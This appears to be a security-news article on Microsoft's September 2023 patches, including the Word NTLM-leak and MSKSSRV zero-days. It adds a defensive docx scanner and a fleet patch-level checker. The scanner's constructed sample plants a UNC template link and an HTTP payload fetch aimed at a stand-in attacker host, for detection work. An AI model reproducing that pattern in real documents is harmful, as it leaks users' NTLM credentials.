Microsoft has released software updates to fix 59 security vulnerabilities in its products, including two zero-day flaws that are being actively exploited in the wild. The patches cover Windows, Azure, Office, Exchange Server and Visual Studio, among others.
Zero-Day Flaws in Microsoft Word and Streaming Service Proxy
The two zero-day vulnerabilities that have been targeted by attackers are:
- CVE-2023-36761: An information disclosure flaw in Microsoft Word. Opening, or merely previewing, a malicious document (for example in the Outlook preview pane) makes Word reach out to an attacker-controlled server, which can capture the user's NTLM hash (the Net-NTLMv2 challenge response) for offline cracking or relay. The flaw affects supported versions of Word, including Word 2013 and 2016, Office 2019, Office LTSC 2021 and Microsoft 365 Apps for Enterprise. Until the update is applied, blocking outbound TCP port 445 at the perimeter and enforcing the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy limit what an attacker can collect.
- CVE-2023-36802: An elevation of privilege flaw in the Microsoft Streaming Service Proxy kernel driver (MSKSSRV.SYS). An attacker who already has local code execution can run a specially crafted application to gain SYSTEM privileges; the bug is not reachable over the network on its own and is the kind chained after an initial foothold such as a phishing payload. The flaw affects Windows 10, Windows 11, Windows Server 2019 and Windows Server 2022.
Microsoft said it is aware of limited targeted attacks using these vulnerabilities and urged users to apply the updates as soon as possible.
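Documents that trigger this class of NTLM leak carry an external package relationship (an attached template, linked object or similar part) whose target is a UNC path or file: URI on the attacker's host, so Word authenticates to that host while resolving the part, without the user clicking anything. The scanner below is an added example written for this article, not Microsoft's detection logic and not taken from the advisory, which does not spell out the exact trigger; it assumes the malicious documents take that shape. The two sample packages are constructed in memory and point at a documentation-range address rather than a real attacker. Plain hyperlinks are external too but are only followed on click, so they are ignored; http(s) targets in auto-fetched parts are reported at medium severity because Office falls back to WebDAV, which can also be made to demand NTLM.

```python
"""Scan an OOXML package (docx/dotx/docm) for relationships that make Word
reach out to a remote host when the file is opened or previewed.
Added example for this article, not Microsoft's detection logic; the sample
documents are constructed in memory and point at a documentation address."""
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List
from urllib.parse import urlsplit

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
REL_TAG = "{%s}Relationship" % RELS_NS
WEB_LIKE = re.compile(r"^https?://", re.IGNORECASE)


def is_remote_target(target: str) -> bool:
    """True for UNC paths and file: URIs that name a host (resolved over SMB,
    falling back to WebDAV); False for local drive paths such as file:///C:/
    which legitimately appear in attached-template links."""
    if target.startswith("\\\\") or target.startswith("//"):
        return True
    if target.lower().startswith("file:"):
        parts = urlsplit(target)
        if parts.netloc and parts.netloc.lower() != "localhost":
            return True
        return parts.path.startswith("//")      # file:////host/share form
    return False


def find_remote_relationships(docx_bytes: bytes) -> List[Dict[str, str]]:
    """One finding per external relationship Word would resolve without a
    click. Hyperlinks are skipped; a rels part that fails to parse is
    reported rather than silently ignored."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                findings.append({"part": name, "target": "", "rel_type": "",
                                 "severity": "unparseable"})
                continue
            for rel in root.iter(REL_TAG):
                if rel.get("TargetMode", "").lower() != "external":
                    continue
                target = rel.get("Target", "").strip()
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                if is_remote_target(target):
                    severity = "high"
                elif WEB_LIKE.match(target) and rel_type != "hyperlink":
                    severity = "medium"         # auto-fetched over HTTP/WebDAV
                else:
                    continue
                findings.append({"part": name, "target": target,
                                 "rel_type": rel_type, "severity": severity})
    return findings


def build_docx(settings_rels_xml: str) -> bytes:
    """Build a minimal docx package (constructed sample) whose
    word/_rels/settings.xml.rels, where attached-template links live,
    is supplied by the caller."""
    content_types = (
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/></Types>')
    package_rels = ('<Relationships xmlns="%s"><Relationship Id="rId1" '
                    'Type="%sofficeDocument" Target="word/document.xml"/>'
                    '</Relationships>' % (RELS_NS, OFFICE_REL))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("_rels/.rels", package_rels)
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/settings.xml", "<settings/>")
        zf.writestr("word/_rels/settings.xml.rels", settings_rels_xml)
    return buf.getvalue()


# Constructed samples; 192.0.2.10 is a documentation-range address.
BENIGN_RELS = (
    '<Relationships xmlns="%s">'
    '<Relationship Id="rId1" Type="%sattachedTemplate" '
    'Target="file:///C:/Users/alice/Templates/Normal.dotm" TargetMode="External"/>'
    '<Relationship Id="rId2" Type="%shyperlink" '
    'Target="https://www.example.com/" TargetMode="External"/>'
    '</Relationships>' % (RELS_NS, OFFICE_REL, OFFICE_REL))
SUSPICIOUS_RELS = (
    '<Relationships xmlns="%s">'
    '<Relationship Id="rId1" Type="%sattachedTemplate" '
    'Target="\\\\192.0.2.10\\share\\template.dotm" TargetMode="External"/>'
    '<Relationship Id="rId2" Type="%soleObject" '
    'Target="http://192.0.2.10/payload.bin" TargetMode="External"/>'
    '</Relationships>' % (RELS_NS, OFFICE_REL, OFFICE_REL))


if __name__ == "__main__":
    # Scan files named on the command line, or the two built-in samples.
    samples = ([(p, open(p, "rb").read()) for p in sys.argv[1:]] or
               [("benign.docx", build_docx(BENIGN_RELS)),
                ("suspicious.docx", build_docx(SUSPICIOUS_RELS))])
    for label, data in samples:
        for hit in find_remote_relationships(data):
            print("%s: %s %s -> %s (%s)" % (label, hit["severity"],
                  hit["rel_type"], hit["target"], hit["part"]))
```

Run it with a path to a document to scan a real file, or with no arguments to see the two constructed samples: the benign one produces no findings, the suspicious one reports the UNC attached template as high and the HTTP-fetched OLE part as medium. The script is a triage aid for mail-gateway quarantines and incident response, not a replacement for the patch, since it only knows the relationship shapes listed in its comments.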
Other Critical Flaws in Internet Connection Sharing, Visual Studio and Azure Kubernetes Service
Besides the two zero-day flaws, Microsoft rated five other vulnerabilities Critical, all of them remote code execution or elevation of privilege bugs. These are:
- CVE-2023-38148: A remote code execution flaw in Internet Connection Sharing (ICS). An unauthenticated attacker on the same network segment can send specially crafted packets to the ICS service and execute arbitrary code on the host. No user interaction is required, but the attacker must be network-adjacent, so the exposure is greatest for hosts that have ICS enabled on untrusted networks. The flaw affects Windows 10 and Windows 11.
- CVE-2023-36792, CVE-2023-36793 and CVE-2023-36796: Remote code execution flaws in Visual Studio that could allow an attacker to execute arbitrary code on a developer's machine by convincing the user to open a specially crafted file. The flaws affect Visual Studio 2017, 2019 and 2022, and the fix is delivered as a Visual Studio update rather than as part of the Windows cumulative update.
- CVE-2023-29332: An elevation of privilege flaw in Microsoft Azure Kubernetes Service that could allow an unauthenticated, network-based attacker to gain Cluster Administrator privileges without any user interaction.
Other Important Flaws in 3D Builder, Azure DevOps Server, MSHTML, Windows Kernel, GDI and Exchange Server
The remaining 54 vulnerabilities, the two zero-days among them, are rated Important and cover remote code execution, information disclosure, spoofing, security feature bypass and elevation of privilege. Some of the notable flaws are:
- CVE-2023-36770, CVE-2023-36771, CVE-2023-36772 and CVE-2023-36773: Remote code execution flaws in 3D Builder that could allow an attacker to execute arbitrary code by convincing a user to open a malicious 3MF file. 3D Builder is a Microsoft Store app on Windows 10 and Windows 11, so the fix arrives through the Store rather than through Windows Update.
- CVE-2023-33136: A remote code execution flaw in Azure DevOps Server that could allow an attacker with a valid account to execute arbitrary code on the server by sending specially crafted requests. The flaw affects Azure DevOps Server 2019 and 2020.
- CVE-2023-36805: A security feature bypass flaw in the Windows MSHTML Platform. MSHTML is still embedded by Office and other applications after the retirement of Internet Explorer, so the fix matters even on systems where the browser itself is disabled. The flaw affects Windows 10 and Windows 11.
- CVE-2023-38139, CVE-2023-38141 and CVE-2023-38142: Elevation of privilege flaws in the Windows Kernel that could allow a local attacker to gain SYSTEM privileges by running a specially crafted application on a vulnerable system. The flaws affect Windows 10 and Windows 11.
- CVE-2023-36804 and CVE-2023-38161: Elevation of privilege flaws in Windows GDI that could allow a local attacker to gain SYSTEM privileges by running a specially crafted application on a vulnerable system. The flaws affect Windows 10 and Windows 11.
- CVE-2023-36744, CVE-2023-36745 and CVE-2023-36756: Remote code execution flaws in Exchange Server that could allow an authenticated attacker on the local network to run code on the server, alongside CVE-2023-36757, a spoofing flaw that could allow an attacker to impersonate another user. The flaws affect Exchange Server 2016 and 2019 and are fixed by the September 2023 Exchange Server Security Update (SU).
How to Update Your System
Microsoft recommends applying the updates as soon as possible to protect against attacks. On Windows 10, go to Settings > Update & Security > Windows Update and click Check for updates (on Windows 11 the page is Settings > Windows Update); the cumulative update can also be downloaded from the Microsoft Update Catalog website for offline or scripted installation. The Windows cumulative update does not cover everything in this release: Office and Visual Studio receive their fixes through their own update channels (Office's File > Account > Update Options and the Visual Studio Installer), 3D Builder through the Microsoft Store, and Exchange Server through the Exchange Security Update. After installing, confirm that the OS build shown by winver matches the build listed in the KB article for your Windows version.
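Clicking Check for updates confirms one machine; across a fleet the check worth automating is whether each host's OS build and UBR (update build revision) have reached the build the KB article lists. The script below is an added example for this article, not a Microsoft tool. The MIN_UBR table holds what the author believes are the September 12, 2023 builds for Windows 10 22H2 (19045.3448) and Windows 11 22H2 (22621.2283); treat those values as assumptions and confirm them against the KB articles before relying on the result. The inventory it reports on is a constructed sample in the format printed by the `ver` command.

```python
"""Report whether Windows hosts carry a given cumulative update by comparing
their build and UBR against the build listed in the KB article.
Added example for this article, not a Microsoft tool. MIN_UBR values are the
author's assumption for the September 12, 2023 updates; verify them."""
import re
from typing import Dict, Optional, Tuple

# Assumed minimum UBR per major build. The major build identifies the release
# (19045 = Windows 10 22H2, 22621 = Windows 11 22H2); confirm against the KB.
MIN_UBR: Dict[int, int] = {19045: 3448, 22621: 2283}

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> Tuple[int, int]:
    """Extract (build, ubr) from text such as the output of `ver`:
    'Microsoft Windows [Version 10.0.19045.3448]'."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError("no four-part version in %r" % text)
    return int(m.group(3)), int(m.group(4))


def patch_status(build: int, ubr: int, minimums: Dict[int, int] = MIN_UBR) -> str:
    """'patched' at or past the required UBR, 'missing' if behind, and
    'unknown-release' when the build is not in the table, which must not be
    read as patched."""
    if build not in minimums:
        return "unknown-release"
    return "patched" if ubr >= minimums[build] else "missing"


def local_build() -> Optional[Tuple[int, int]]:
    """Read this host's build from the registry on Windows; None elsewhere."""
    try:
        import winreg
    except ImportError:
        return None
    key = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion"
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as k:
        build = int(winreg.QueryValueEx(k, "CurrentBuildNumber")[0])
        ubr = int(winreg.QueryValueEx(k, "UBR")[0])
    return build, ubr


def report(inventory: Dict[str, str],
           minimums: Dict[int, int] = MIN_UBR) -> Dict[str, str]:
    """Status per host from a mapping of hostname -> `ver` output, as a
    fleet tool or login script might collect it."""
    out = {}
    for host, text in inventory.items():
        try:
            build, ubr = parse_version(text)
        except ValueError:
            out[host] = "unparseable"
            continue
        out[host] = patch_status(build, ubr, minimums)
    return out


# Constructed sample inventory (hostnames and builds invented for the example).
SAMPLE_INVENTORY = {
    "ws01": "Microsoft Windows [Version 10.0.19045.3448]",
    "ws02": "Microsoft Windows [Version 10.0.19045.3324]",
    "ws03": "Microsoft Windows [Version 10.0.22621.2361]",
    "srv01": "Microsoft Windows [Version 10.0.17763.4851]",
}

if __name__ == "__main__":
    here = local_build()
    if here:
        print("this host: %d.%d -> %s" % (here[0], here[1], patch_status(*here)))
    for host, status in report(SAMPLE_INVENTORY).items():
        print("%s: %s" % (host, status))
```

The unknown-release status is deliberate: a Windows Server 2019 host (build 17763) is not covered by the two table entries, and reporting it as patched by default would hide exactly the machines an administrator forgot to add. Extend MIN_UBR with the build from each KB article for the releases in your estate.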